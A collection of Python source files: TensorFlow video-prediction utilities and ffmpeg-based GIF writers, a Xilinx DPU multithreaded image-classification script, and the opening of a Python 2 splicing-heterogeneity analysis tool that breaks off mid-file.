"""Encode the given tensor to given image shape."""
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
x = inputs
x = tfl.flatten(x)
x = tfl.dense(x, shape[2], activation=None, name="dec_dense")
x = tf.expand_dims(x, axis=1)
return x
def basic_lstm(inputs, state, num_units, name=None):
"""Basic LSTM."""
input_shape = common_layers.shape_list(inputs)
# reuse parameters across time-steps.
cell = tf.nn.rnn_cell.BasicLSTMCell(
num_units, name=name, reuse=tf.AUTO_REUSE)
if state is None:
state = cell.zero_state(input_shape[0], tf.float32)
outputs, new_state = cell(inputs, state)
return outputs, new_state
def lstm_cell(inputs,
state,
num_units,
use_peepholes=False,
cell_clip=0.0,
initializer=None,
num_proj=None,
num_unit_shards=None,
num_proj_shards=None,
reuse=None,
name=None):
"""Full LSTM cell."""
input_shape = common_layers.shape_list(inputs)
cell = tf.nn.rnn_cell.LSTMCell(num_units,
use_peepholes=use_peepholes,
cell_clip=cell_clip,
initializer=initializer,
num_proj=num_proj,
num_unit_shards=num_unit_shards,
num_proj_shards=num_proj_shards,
reuse=reuse,
name=name,
state_is_tuple=False)
if state is None:
state = cell.zero_state(input_shape[0], tf.float32)
outputs, new_state = cell(inputs, state)
return outputs, new_state
def conv_lstm_2d(inputs, state, output_channels,
kernel_size=5, name=None, spatial_dims=None):
"""2D Convolutional LSTM."""
input_shape = common_layers.shape_list(inputs)
batch_size, input_channels = input_shape[0], input_shape[-1]
if spatial_dims is None:
input_shape = input_shape[1:]
else:
input_shape = spatial_dims + [input_channels]
cell = tf.contrib.rnn.ConvLSTMCell(
2, input_shape, output_channels,
[kernel_size, kernel_size], name=name)
if state is None:
state = cell.zero_state(batch_size, tf.float32)
outputs, new_state = cell(inputs, state)
return outputs, new_state
def scheduled_sample_count(ground_truth_x,
generated_x,
batch_size,
scheduled_sample_var):
"""Sample batch with specified mix of groundtruth and generated data points.
Args:
ground_truth_x: tensor of ground-truth data points.
generated_x: tensor of generated data points.
batch_size: batch size
scheduled_sample_var: number of ground-truth examples to include in batch.
Returns:
New batch with num_ground_truth sampled from ground_truth_x and the rest
from generated_x.
"""
num_ground_truth = scheduled_sample_var
idx = tf.random_shuffle(tf.range(batch_size))
ground_truth_idx = tf.gather(idx, tf.range(num_ground_truth))
generated_idx = tf.gather(idx, tf.range(num_ground_truth, batch_size))
ground_truth_examps = tf.gather(ground_truth_x, ground_truth_idx)
generated_examps = tf.gather(generated_x, generated_idx)
output = tf.dynamic_stitch([ground_truth_idx, generated_idx],
[ground_truth_examps, generated_examps])
# if batch size is known set it.
if isinstance(batch_size, int):
output.set_shape([batch_size] + common_layers.shape_list(output)[1:])
return output
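# Illustrative example: with batch_size=4 and scheduled_sample_var=3, three of the
# four rows of the output come from ground_truth_x and one from generated_x, their
# positions determined by the shuffled index tensor above.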
def inject_additional_input(layer, inputs, name, mode="concat"):
"""Injects the additional input into the layer.
Args:
layer: layer that the input should be injected to.
inputs: inputs to be injected.
name: TF scope name.
mode: how the info should be added to the layer:
"concat" concats as additional channels.
"multiplicative" broadcasts inputs and multiply them to the channels.
"multi_additive" broadcasts inputs and multiply and add to the channels.
Returns:
updated layer.
Raises:
ValueError: in case of unknown mode.
"""
layer_shape = common_layers.shape_list(layer)
input_shape = common_layers.shape_list(inputs)
zeros_mask = tf.zeros(layer_shape, dtype=tf.float32)
if mode == "concat":
emb = encode_to_shape(inputs, layer_shape, name)
layer = tf.concat(values=[layer, emb], axis=-1)
elif mode == "multiplicative":
filters = layer_shape[-1]
input_reshaped = tf.reshape(inputs, [-1, 1, 1, input_shape[-1]])
input_mask = tf.layers.dense(input_reshaped, filters, name=name)
input_broad = input_mask + zeros_mask
layer *= input_broad
elif mode == "multi_additive":
filters = layer_shape[-1]
input_reshaped = tf.reshape(inputs, [-1, 1, 1, input_shape[-1]])
input_mul = tf.layers.dense(input_reshaped, filters, name=name + "_mul")
layer *= tf.nn.sigmoid(input_mul)
input_add = tf.layers.dense(input_reshaped, filters, name=name + "_add")
layer += input_add
else:
raise ValueError("Unknown injection mode: %s" % mode)
return layer
def scheduled_sample_prob(ground_truth_x,
generated_x,
batch_size,
scheduled_sample_var):
"""Probability based scheduled sampling.
Args:
ground_truth_x: tensor of ground-truth data points.
generated_x: tensor of generated data points.
batch_size: batch size
scheduled_sample_var: probability of choosing from ground_truth.
Returns:
New batch with randomly selected data points.
"""
probability_threshold = scheduled_sample_var
probability_of_generated = tf.random_uniform([batch_size])
return tf.where(probability_of_generated > probability_threshold,
generated_x, ground_truth_x)
def dna_transformation(prev_image, dna_input, dna_kernel_size, relu_shift):
"""Apply dynamic neural advection to previous image.
Args:
prev_image: previous image to be transformed.
dna_input: hidden layer to be used for computing DNA transformation.
dna_kernel_size: dna kernel size.
relu_shift: shift for ReLU function.
Returns:
List of images transformed by the predicted CDNA kernels.
"""
# Construct translated images.
prev_image_pad = tf.pad(prev_image, [[0, 0], [2, 2], [2, 2], [0, 0]])
image_height = int(prev_image.get_shape()[1])
image_width = int(prev_image.get_shape()[2])
inputs = []
for xkern in range(dna_kernel_size):
for ykern in range(dna_kernel_size):
inputs.append(
tf.expand_dims(
tf.slice(prev_image_pad, [0, xkern, ykern, 0],
[-1, image_height, image_width, -1]), [3]))
inputs = tf.concat(axis=3, values=inputs)
# Normalize channels to 1.
kernel = tf.nn.relu(dna_input - relu_shift) + relu_shift
kernel = tf.expand_dims(
kernel / tf.reduce_sum(kernel, [3], keep_dims=True), [4])
return tf.reduce_sum(kernel * inputs, [3], keep_dims=False)
def cdna_transformation(prev_image, cdna_input, num_masks, color_channels,
dna_kernel_size, relu_shift):
"""Apply convolutional dynamic neural advection to previous image.
Args:
prev_image: previous image to be transformed.
cdna_input: hidden layer to be used for computing CDNA kernels.
num_masks: number of masks and hence the number of CDNA transformations.
color_channels: the number of color channels in the images.
dna_kernel_size: dna kernel size.
relu_shift: shift for ReLU function.
Returns:
List of images transformed by the predicted CDNA kernels.
"""
batch_size = tf.shape(cdna_input)[0]
height = int(prev_image.get_shape()[1])
width = int(prev_image.get_shape()[2])
# Predict kernels using linear function of last hidden layer.
cdna_kerns = tfl.dense(
cdna_input, dna_kernel_size * dna_kernel_size * num_masks,
name="cdna_params",
activation=None)
# Reshape and normalize.
cdna_kerns = tf.reshape(
cdna_kerns, [batch_size, dna_kernel_size, dna_kernel_size, 1, num_masks])
cdna_kerns = (tf.nn.relu(cdna_kerns - relu_shift) + relu_shift)
norm_factor = tf.reduce_sum(cdna_kerns, [1, 2, 3], keep_dims=True)
cdna_kerns /= norm_factor
# Treat the color channel dimension as the batch dimension since the same
# transformation is applied to each color channel.
# Treat the batch dimension as the channel dimension so that
# depthwise_conv2d can apply a different transformation to each sample.
cdna_kerns = tf.transpose(cdna_kerns, [1, 2, 0, 4, 3])
cdna_kerns = tf.reshape(
cdna_kerns, [dna_kernel_size, dna_kernel_size, batch_size, num_masks])
# Swap the batch and channel dimensions.
prev_image = tf.transpose(prev_image, [3, 1, 2, 0])
# Transform image.
transformed = tf.nn.depthwise_conv2d(
prev_image, cdna_kerns, [1, 1, 1, 1], "SAME")
# Transpose the dimensions to where they belong.
transformed = tf.reshape(
transformed, [color_channels, height, width, batch_size, num_masks])
transformed = tf.transpose(transformed, [3, 1, 2, 0, 4])
transformed = tf.unstack(transformed, axis=-1)
return transformed
def vgg_layer(inputs,
nout,
kernel_size=3,
activation=tf.nn.leaky_relu,
padding="SAME",
is_training=True,
has_batchnorm=False,
scope=None):
"""A layer of VGG network with batch norm.
Args:
inputs: image tensor
nout: number of output channels
kernel_size: size of the kernel
activation: activation function
padding: padding of the image
is_training: whether it is training mode or not
has_batchnorm: whether batchnorm is applied or not
scope: variable scope of the op
Returns:
net: output of layer
"""
with tf.variable_scope(scope):
net = tfl.conv2d(inputs, nout, kernel_size=kernel_size, padding=padding,
activation=None, name="conv")
if has_batchnorm:
net = tfl.batch_normalization(net, training=is_training, name="bn")
net = activation(net)
return net
def tile_and_concat(image, latent, concat_latent=True):
"""Tile latent and concatenate to image across depth.
Args:
image: 4-D Tensor, (batch_size X height X width X channels)
latent: 2-D Tensor, (batch_size X latent_dims)
concat_latent: If set to False, the image is returned as is.
Returns:
concat_latent: 4-D Tensor, (batch_size X height X width X channels+1)
latent tiled and concatenated to the image across the channels.
"""
if not concat_latent:
return image
image_shape = common_layers.shape_list(image)
latent_shape = common_layers.shape_list(latent)
height, width = image_shape[1], image_shape[2]
latent_dims = latent_shape[1]
height_multiples = height // latent_dims
pad = height - (height_multiples * latent_dims)
latent = tf.reshape(latent, (-1, latent_dims, 1, 1))
latent = tf.tile(latent, (1, height_multiples, width, 1))
latent = tf.pad(latent, [[0, 0], [pad // 2, pad // 2], [0, 0], [0, 0]])
return tf.concat([image, latent], axis=-1)
def _encode_gif(images, fps):
"""Encodes numpy images into gif string.
Args:
images: A 4-D `uint8` `np.array` (or a list of 3-D images) of shape
`[time, height, width, channels]` where `channels` is 1 or 3.
fps: frames per second of the animation
Returns:
The encoded gif string.
Raises:
IOError: If the ffmpeg command returns an error.
"""
writer = WholeVideoWriter(fps)
writer.write_multi(images)
return writer.finish()
def ffmpeg_works():
"""Tries to encode images with ffmpeg to check if it works."""
images = np.zeros((2, 32, 32, 3), dtype=np.uint8)
try:
_encode_gif(images, 2)
return True
except (IOError, OSError):
return False
def py_gif_summary(tag, images, max_outputs, fps, return_summary_value=False):
"""Outputs a `Summary` protocol buffer with gif animations.
Args:
tag: Name of the summary.
images: A 5-D `uint8` `np.array` of shape `[batch_size, time, height, width,
channels]` where `channels` is 1 or 3.
max_outputs: Max number of batch elements to generate gifs for.
fps: frames per second of the animation.
return_summary_value: If set to True, return a list of tf.Summary.Value
objects in addition to the protocol buffer.
Returns:
The serialized `Summary` protocol buffer.
Raises:
ValueError: If `images` is not a 5-D `uint8` array with 1 or 3 channels.
"""
images = np.asarray(images)
if images.dtype != np.uint8:
raise ValueError("Tensor must have dtype uint8 for gif summary.")
if images.ndim != 5:
raise ValueError("Tensor must be 5-D for gif summary.")
batch_size, _, height, width, channels = images.shape
if channels not in (1, 3):
raise ValueError("Tensors must have 1 or 3 channels for gif summary.")
summ = tf.Summary()
all_summ_values = []
num_outputs = min(batch_size, max_outputs)
for i in range(num_outputs):
image_summ = tf.Summary.Image()
image_summ.height = height
image_summ.width = width
image_summ.colorspace = channels # 1: grayscale, 3: RGB
try:
image_summ.encoded_image_string = _encode_gif(images[i], fps)
except (IOError, OSError) as e:
tf.logging.warning(
"Unable to encode images to a gif string because either ffmpeg is "
"not installed or ffmpeg returned an error: %s. Falling back to an "
"image summary of the first frame in the sequence.", e)
try:
from PIL import Image # pylint: disable=g-import-not-at-top
import io # pylint: disable=g-import-not-at-top
with io.BytesIO() as output:
Image.fromarray(images[i][0]).save(output, "PNG")
image_summ.encoded_image_string = output.getvalue()
except ImportError as e:
tf.logging.warning(
"Gif summaries requires ffmpeg or PIL to be installed: %s", e)
image_summ.encoded_image_string = ""
if num_outputs == 1:
summ_tag = "{}/gif".format(tag)
else:
summ_tag = "{}/gif/{}".format(tag, i)
curr_summ_value = tf.Summary.Value(tag=summ_tag, image=image_summ)
all_summ_values.append(curr_summ_value)
summ.value.add(tag=summ_tag, image=image_summ)
summ_str = summ.SerializeToString()
if return_summary_value:
return all_summ_values, summ_str
return summ_str
def gif_summary(name, tensor, max_outputs=3, fps=10, collections=None,
family=None):
"""Outputs a `Summary` protocol buffer with gif animations.
Args:
name: Name of the summary.
tensor: A 5-D `uint8` `Tensor` of shape `[batch_size, time, height, width,
channels]` where `channels` is 1 or 3.
max_outputs: Max number of batch elements to generate gifs for.
fps: frames per second of the animation
collections: Optional list of tf.GraphKeys. The collections to add the
summary to. Defaults to [tf.GraphKeys.SUMMARIES]
family: Optional; if provided, used as the prefix of the summary tag name,
which controls the tab name used for display on Tensorboard.
Returns:
A scalar `Tensor` of type `string`. The serialized `Summary` protocol
buffer.
Raises:
ValueError: if the given tensor has the wrong shape.
"""
tensor = tf.convert_to_tensor(tensor)
if len(tensor.get_shape()) != 5:
raise ValueError("Assuming videos given as tensors in the format "
"[batch, time, height, width, channels] but got one "
"of shape: %s" % str(tensor.get_shape()))
tensor = tf.cast(tensor, tf.uint8)
if summary_op_util.skip_summary():
return tf.constant("")
with summary_op_util.summary_scope(
name, family, values=[tensor]) as (tag, scope):
val = tf.py_func(
py_gif_summary,
[tag, tensor, max_outputs, fps],
tf.string,
stateful=False,
name=scope)
summary_op_util.collect(val, collections, [tf.GraphKeys.SUMMARIES])
return val
def tinyify(array, tiny_mode, small_mode):
if tiny_mode:
return [1 for _ in array]
if small_mode:
return [max(x // 4, 1) for x in array]
return array
def get_gaussian_tensor(mean, log_var):
z = tf.random_normal(tf.shape(mean), 0, 1, dtype=tf.float32)
z = mean + tf.exp(log_var / 2.0) * z
return z
def conv_latent_tower(images, time_axis, latent_channels=1, min_logvar=-5,
is_training=False, random_latent=False,
tiny_mode=False, small_mode=False):
"""Builds convolutional latent tower for stochastic model.
At training time this tower generates a latent distribution (mean and std)
conditioned on the entire video. This latent variable will be fed to the
main tower as an extra variable to be used for future frames prediction.
At inference time, the tower is disabled and only returns latents sampled
from N(0,1).
If the multi_latent flag is on, a different latent for every timestep would
be generated.
Args:
images: tensor of ground truth image sequences
time_axis: the time axis in images tensor
latent_channels: number of latent channels
min_logvar: minimum value for log_var
is_training: whether or not it is training mode
random_latent: whether or not generate random latents
tiny_mode: whether or not it is tiny_mode. tiny_mode sets the number
of conv channels to 1 at each layer. useful for testing the
integration tests.
small_mode: whether or not it is small_mode. small mode is the same model
with less conv and lstm layers and also lower number of channels.
suitable for videos with less complexity and testing.
Returns:
latent_mean: predicted latent mean
latent_logvar: predicted latent log variance
"""
conv_size = tinyify([32, 64, 64], tiny_mode, small_mode)
with tf.variable_scope("latent", reuse=tf.AUTO_REUSE):
images = tf.to_float(images)
images = tf.unstack(images, axis=time_axis)
images = tf.concat(images, axis=3)
x = images
x = common_layers.make_even_size(x)
x = tfl.conv2d(x, conv_size[0], [3, 3], strides=(2, 2),
padding="SAME", activation=tf.nn.relu, name="latent_conv1")
x = tfcl.layer_norm(x)
if not small_mode:
x = tfl.conv2d(x, conv_size[1], [3, 3], strides=(2, 2),
padding="SAME", activation=tf.nn.relu, name="latent_conv2")
x = tfcl.layer_norm(x)
x = tfl.conv2d(x, conv_size[2], [3, 3], strides=(1, 1),
padding="SAME", activation=tf.nn.relu, name="latent_conv3")
x = tfcl.layer_norm(x)
nc = latent_channels
mean = tfl.conv2d(x, nc, [3, 3], strides=(2, 2),
padding="SAME", activation=None, name="latent_mean")
logv = tfl.conv2d(x, nc, [3, 3], strides=(2, 2),
padding="SAME", activation=tf.nn.relu, name="latent_std")
logvar = logv + min_logvar
# No latent tower at inference time, just standard gaussian.
if not is_training:
return tf.zeros_like(mean), tf.zeros_like(logvar)
# No latent in the first phase
ret_mean, ret_logvar = tf.cond(
random_latent,
lambda: (tf.zeros_like(mean), tf.zeros_like(logvar)),
lambda: (mean, logvar))
return ret_mean, ret_logvar
def beta_schedule(schedule, global_step, final_beta, decay_start, decay_end):
"""Get KL multiplier (beta) based on the schedule."""
if decay_start > decay_end:
raise ValueError("decay_end is smaller than decay_end.")
# Since some of the TF schedules do not support incrementing a value,
# in all of the schedules, we anneal the beta from final_beta to zero
# and then reverse it at the bottom.
if schedule == "constant":
decayed_value = 0.0
elif schedule == "linear":
decayed_value = tf.train.polynomial_decay(
learning_rate=final_beta,
global_step=global_step - decay_start,
decay_steps=decay_end - decay_start,
end_learning_rate=0.0)
elif schedule == "noisy_linear_cosine_decay":
decayed_value = tf.train.noisy_linear_cosine_decay(
learning_rate=final_beta,
global_step=global_step - decay_start,
decay_steps=decay_end - decay_start)
# TODO(mechcoder): Add log_annealing schedule.
else:
raise ValueError("Unknown beta schedule.")
increased_value = final_beta - decayed_value
increased_value = tf.maximum(0.0, increased_value)
beta = tf.case(
pred_fn_pairs={
tf.less(global_step, decay_start): lambda: 0.0,
tf.greater(global_step, decay_end): lambda: final_beta},
default=lambda: increased_value)
return beta
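# Illustrative behaviour of the "linear" schedule: with final_beta=1e-3,
# decay_start=1000 and decay_end=2000, beta is 0.0 before step 1000, ramps
# linearly up to 1e-3 between steps 1000 and 2000, and stays at 1e-3 afterwards.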
def extract_random_video_patch(videos, num_frames=-1):
"""For every video, extract a random consecutive patch of num_frames.
Args:
videos: 5-D Tensor, (NTHWC)
num_frames: Integer, if -1 then the entire video is returned.
Returns:
video_patch: 5-D Tensor, (NTHWC) with T = num_frames.
Raises:
ValueError: If num_frames is greater than the number of total frames in
the video.
"""
if num_frames == -1:
return videos
batch_size, num_total_frames, h, w, c = common_layers.shape_list(videos)
if num_total_frames < num_frames:
raise ValueError("Expected num_frames <= %d, got %d" %
(num_total_frames, num_frames))
# Randomly choose start_inds for each video.
frame_start = tf.random_uniform(
shape=(batch_size,), minval=0, maxval=num_total_frames - num_frames + 1,
dtype=tf.int32)
# [start[0], start[0] + 1, ... start[0] + num_frames - 1] + ...
# [start[batch_size-1], ... start[batch_size-1] + num_frames - 1]
range_inds = tf.expand_dims(tf.range(num_frames), axis=0)
frame_inds = range_inds + tf.expand_dims(frame_start, axis=1)
frame_inds = tf.reshape(frame_inds, [-1])
# [0]*num_frames + [1]*num_frames + ... [batch_size-1]*num_frames
batch_inds = tf.expand_dims(tf.range(batch_size), axis=1)
batch_inds = tf.tile(batch_inds, [1, num_frames])
batch_inds = tf.reshape(batch_inds, [-1])
gather_inds = tf.stack((batch_inds, frame_inds), axis=1)
video_patches = tf.gather_nd(videos, gather_inds)
return tf.reshape(video_patches, (batch_size, num_frames, h, w, c))
class VideoWriter(object):
"""Base helper class for writing videos."""
def write(self, frame, encoded_frame=None):
"""Writes a single video frame."""
raise NotImplementedError
def write_multi(self, frames, encoded_frames=None):
"""Writes multiple video frames."""
if encoded_frames is None:
# Infinite iterator.
encoded_frames = iter(lambda: None, 1)
for (frame, encoded_frame) in zip(frames, encoded_frames):
self.write(frame, encoded_frame)
def finish(self):
"""Finishes writing frames and returns output, if any.
Frees any resources acquired by the writer.
"""
pass
def save_to_disk(self, output):
"""Saves output to disk.
Args:
output: result of finish().
"""
raise NotImplementedError
def finish_to_disk(self):
"""Finishes writing frames and saves output to disk, if any."""
output = self.finish() # pylint: disable=assignment-from-no-return
if output is not None:
self.save_to_disk(output)
def __del__(self):
"""Frees any resources acquired by the writer."""
self.finish()
class WholeVideoWriter(VideoWriter):
"""Helper class for writing whole videos."""
def __init__(self, fps, output_path=None, file_format="gif"):
self.fps = fps
self.output_path = output_path
self.file_format = file_format
self.proc = None
self._out_chunks = []
self._err_chunks = []
self._out_thread = None
self._err_thread = None
def __init_ffmpeg(self, image_shape):
"""Initializes ffmpeg to write frames."""
import itertools # pylint: disable=g-import-not-at-top
from subprocess import Popen, PIPE # pylint: disable=g-import-not-at-top,g-multiple-import,g-importing-member
ffmpeg = "ffmpeg"
height, width, channels = image_shape
self.cmd = [
ffmpeg, "-y",
"-f", "rawvideo",
"-vcodec", "rawvideo",
"-r", "%.02f" % self.fps,
"-s", "%dx%d" % (width, height),
"-pix_fmt", {1: "gray", 3: "rgb24"}[channels],
"-i", "-",
"-filter_complex", "[0:v]split[x][z];[x]fifo[w];[z]palettegen,fifo[y];"
"[w][y]paletteuse,fifo",
"-r", "%.02f" % self.fps,
"-f", self.file_format,
"-qscale", "0",
"-"
]
self.proc = Popen(
self.cmd, stdin=PIPE, stdout=PIPE, stderr=PIPE, bufsize=-1
)
(self._out_thread, self._err_thread) = itertools.starmap(
self._start_reader_thread, [
(self.proc.stdout, self._out_chunks),
(self.proc.stderr, self._err_chunks)
]
)
def _start_reader_thread(self, stream, chunks):
"""Starts a thread for reading output from FFMPEG.
The thread reads consecutive chunks from the stream and saves them in
the given list.
Args:
stream: output stream of the FFMPEG process.
chunks: list to save output chunks to.
Returns:
Thread
"""
import io # pylint: disable=g-import-not-at-top
import threading # pylint: disable=g-import-not-at-top
def target():
while True:
chunk = stream.read(io.DEFAULT_BUFFER_SIZE)
if not chunk:
break
chunks.append(chunk)
thread = threading.Thread(target=target)
thread.start()
return thread
def write(self, frame, encoded_frame=None):
if self.proc is None:
self.__init_ffmpeg(frame.shape)
self.proc.stdin.write(frame.tostring())
def finish(self):
"""Finishes transconding and returns the video.
Returns:
bytes
Raises:
IOError: in case of transcoding error.
"""
if self.proc is None:
return None
self.proc.stdin.close()
for thread in (self._out_thread, self._err_thread):
thread.join()
(out, err) = [
b"".join(chunks) for chunks in (self._out_chunks, self._err_chunks)
]
if self.proc.returncode:
err = "\n".join([" ".join(self.cmd), err.decode("utf8")])
raise IOError(err)
del self.proc
self.proc = None
return out
def save_to_disk(self, output):
if self.output_path is None:
raise ValueError(
"This writer doesn't support saving to disk (output_path not "
"specified)."
)
with tf.gfile.Open(self.output_path, "w") as f:
f.write(output)
class BatchWholeVideoWriter(VideoWriter):
"""Helper class for writing videos in batch."""
def __init__(self, fps, path_template, file_format="gif"):
self.fps = fps
self.path_template = path_template
self.file_format = file_format
self.writers = None
def write(self, batch_frame, batch_encoded_frame=None):
del batch_encoded_frame
if self.writers is None:
self.writers = [
WholeVideoWriter(
self.fps, self.path_template.format(i), self.file_format
)
for i in range(len(batch_frame))
]
for i, frame in enumerate(batch_frame):
self.writers[i].write(frame)
def finish(self):
outs = [w.finish() for w in self.writers]
return outs
def save_to_disk(self, outputs):
for (writer, output) in zip(self.writers, outputs):
writer.save_to_disk(output)
class IndividualFrameWriter(VideoWriter):
"""Helper class for writing individual video frames."""
def __init__(self, output_dir):
self.output_dir = output_dir
self._counter = 0
def write(self, frame=None, encoded_frame=None):
import os # pylint: disable=g-import-not-at-top
if encoded_frame is None:
raise ValueError("This writer only supports encoded frames.")
path = os.path.join(self.output_dir, "frame_%05d.png" % self._counter)
with tf.gfile.Open(path, "wb") as f:
f.write(encoded_frame)
self._counter += 1
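# Minimal usage sketch for the writers above (requires ffmpeg on PATH; the output
# path is a placeholder):
#
#   frames = np.zeros((16, 64, 64, 3), dtype=np.uint8)  # [time, height, width, channels]
#   writer = WholeVideoWriter(fps=10, output_path='/tmp/example.gif')
#   writer.write_multi(frames)
#   writer.finish_to_disk()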
|
app_mt.py
|
'''
Copyright 2020 Xilinx Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
from ctypes import *
import cv2
import numpy as np
import runner
import os
import math
import threading
import time
import sys
import argparse
def preprocess_fn(image_path):
'''
Image pre-processing.
Rearranges from BGR to RGB then normalizes to range 0:1
input arg: path of image file
return: numpy array
'''
image = cv2.imread(image_path)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image = image/255.0
return image
def runDPU(id,start,dpu,img):
'''get tensor'''
inputTensors = dpu.get_input_tensors()
outputTensors = dpu.get_output_tensors()
tensorformat = dpu.get_tensor_format()
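# NCHW tensors are laid out as [batch, channels, height, width]; NHWC as
# [batch, height, width, channels], hence the different dim indices below.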
if tensorformat == dpu.TensorFormat.NCHW:
outputHeight = outputTensors[0].dims[2]
outputWidth = outputTensors[0].dims[3]
outputChannel = outputTensors[0].dims[1]
elif tensorformat == dpu.TensorFormat.NHWC:
outputHeight = outputTensors[0].dims[1]
outputWidth = outputTensors[0].dims[2]
outputChannel = outputTensors[0].dims[3]
else:
exit("Format error")
outputSize = outputHeight*outputWidth*outputChannel
batchSize = inputTensors[0].dims[0]
n_of_images = len(img)
count = 0
write_index = start
while count < n_of_images:
if (count+batchSize<=n_of_images):
runSize = batchSize
else:
runSize=n_of_images-count
shapeIn = (runSize,) + tuple([inputTensors[0].dims[i] for i in range(inputTensors[0].ndims)][1:])
'''prepare batch input/output '''
outputData = []
inputData = []
outputData.append(np.empty((runSize,outputHeight,outputWidth,outputChannel), dtype = np.float32, order = 'C'))
inputData.append(np.empty((shapeIn), dtype = np.float32, order = 'C'))
'''init input image to input buffer '''
for j in range(runSize):
imageRun = inputData[0]
imageRun[j,...] = img[(count+j)% n_of_images].reshape(inputTensors[0].dims[1],inputTensors[0].dims[2],inputTensors[0].dims[3])
'''run with batch '''
job_id = dpu.execute_async(inputData,outputData)
dpu.wait(job_id)
for j in range(len(outputData)):
outputData[j] = outputData[j].reshape(runSize, outputSize)
'''store output vectors '''
for j in range(runSize):
out_q[write_index] = outputData[0][j]
write_index += 1
count = count + runSize
def app(image_dir,threads,model):
listimage=os.listdir(image_dir)
runTotal = len(listimage)
global out_q
out_q = [None] * runTotal
all_dpu_runners = []
threadAll = []
for i in range(threads):
all_dpu_runners.append(runner.Runner(model)[0])
''' preprocess images '''
img = []
for i in range(runTotal):
path = os.path.join(image_dir,listimage[i])
img.append(preprocess_fn(path))
'''run threads '''
start=0
for i in range(threads):
if (i==threads-1):
end = len(img)
else:
end = start+(len(img)//threads)
in_q = img[start:end]
t1 = threading.Thread(target=runDPU, args=(i,start,all_dpu_runners[i], in_q))
threadAll.append(t1)
start=end
time1 = time.time()
for x in threadAll:
x.start()
for x in threadAll:
x.join()
time2 = time.time()
timetotal = time2 - time1
fps = float(runTotal / timetotal)
print("FPS=%.2f, total frames = %.0f , time=%.4f seconds" %(fps,runTotal, timetotal))
''' post-processing '''
classes = ['airplane','automobile','bird','cat','deer','dog','frog','horse','ship','truck']
correct = 0
wrong = 0
print('output buffer length:',len(out_q))
for i in range(len(out_q)):
argmax = np.argmax((out_q[i]))
prediction = classes[argmax]
ground_truth, _ = listimage[i].split('_')
if (ground_truth==prediction):
correct += 1
else:
wrong += 1
accuracy = correct/len(out_q)
print('Correct:',correct,'Wrong:',wrong,'Accuracy:', accuracy)
# only used if script is run as 'main' from command line
def main():
# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument('-d', '--image_dir',
type=str,
default='images',
help='Path to folder of images. Default is images')
ap.add_argument('-t', '--threads',
type=int,
default=1,
help='Number of threads. Default is 1')
ap.add_argument('-m', '--model',
type=str,
default='model_dir',
help='Path of folder with .elf & .json. Default is model_dir')
args = ap.parse_args()
print ('Command line options:')
print (' --image_dir : ', args.image_dir)
print (' --threads : ', args.threads)
print (' --model : ', args.model)
app(args.image_dir,args.threads,args.model)
if __name__ == '__main__':
main()
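# Example invocation (values are simply the script's own defaults, spelled out):
#   python app_mt.py --image_dir images --threads 1 --model model_dir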
|
SpliceHetero.py
|
import os
import sys
import commands
import numpy as np
import time
import math
import multiprocessing as mp
import itertools
import argparse
import random
from scipy.stats import entropy
import datetime
nn = "\n"
tt = "\t"
ss = "/"
cc = ","
def GET_TIME():
return str(datetime.datetime.now()).split(".")[0]
##End GET_TIME
def main():
#[1]Argument Parsing
print "STEP_1: Argument Parsing... [%s]"%GET_TIME()
ArgumentParser = GenArgumentParser()
#[2]Input Processing
print "STEP_2: Input Processing... [%s]"%GET_TIME()
InputHandler = GenInputHandler(ArgumentParser)
#[3]sITH Calculation
print "STEP_3: sITH Calculation... [%s]"%GET_TIME()
UnitHandler = GenUnitHandler(ArgumentParser, InputHandler)
#[4]
print "Completed [%s]"%GET_TIME()
##End main
class GenArgumentParser(object):
def __init__(self):
#[1]
self.Parser_obj = argparse.ArgumentParser()
self.BuildParser_method()
#[2]
self.Handler_obj = self.Parser_obj.parse_args()
self.CheckHandler_method()
#[3]
self.Out_dir = self.Handler_obj.out_directory_path; makePath(self.Out_dir)
self.ArgumentExport_method()
##End init
def ArgumentExport_method(self):
#[1]
Argument_path = self.Out_dir + ss + "ARGUMENTS.txt"
Argument_file = open(Argument_path, 'w')
COMMAND_line = "CMD: %s"%makeLine(sys.argv, " ")
Argument_file.write(COMMAND_line + nn)
#[2]
ARG_index = 1
for ARG_NAME in sorted(self.Handler_obj.__dict__):
ARG_VALUE = self.Handler_obj.__dict__[ARG_NAME]
ARG_line = "[%s]%s=%s"%(ARG_index, ARG_NAME, ARG_VALUE); ARG_index += 1
Argument_file.write(ARG_line + nn)
##End for
#[3]
Argument_file.close()
##End ArgumentExport_method
def CheckHandler_method(self):
#[1]
self.Message_list = []
#[2]
self.Message_list.append("Usage: python SpliceHetero.py [arguments]")
self.Message_list.append("\nEssemtial Arguments:")
self.Message_list.append("'-csp', '--Case_Sample_path' [PATH]\t\tList of case-sample input (see CANCER_SAMPLES.txt for input format)")
self.Message_list.append("'-rsp', '--Reference_Sample_path' [PATH]\t\tList of reference-sample input (see NORMAL_SAMPLES.txt for input format)")
self.Message_list.append("'-odp', '--Out_Dir_path' [PATH]\t\tDirectory path for output'")
#[3]
self.Message_list.append("\nOptional Arguments:")
self.Message_list.append("'-prn', '--Process_number' [INT]\t\tNumber of processes to use (default: 1)")
self.Message_list.append("'-slb', '--Stranded_Library_bool' [BOOL]\t\tIf it is stranded library (options: True/False, default: False)'")
#[4]
self.Message_line = makeLine(self.Message_list, nn)
self.Essential_list = ["case_sample_path", "reference_sample_path", "out_directory_path"]
for arg_name in self.Essential_list:
if self.Handler_obj.__dict__[arg_name] == None:
sys.exit(self.Message_line)
##End if
##End for
##End CheckHandler_method
def BuildParser_method(self):
#[1]Essential
self.Parser_obj.add_argument('-csp', '--Case_Sample_path', dest="case_sample_path",help = "")
self.Parser_obj.add_argument('-rsp', '--Reference_Sample_path', dest="reference_sample_path",help = "")
self.Parser_obj.add_argument('-odp', '--Out_Dir_path', dest="out_directory_path",help = "")
#[2]Optional
self.Parser_obj.add_argument('-prn', '--Process_number', dest="process_number_int",help = "", default=1)
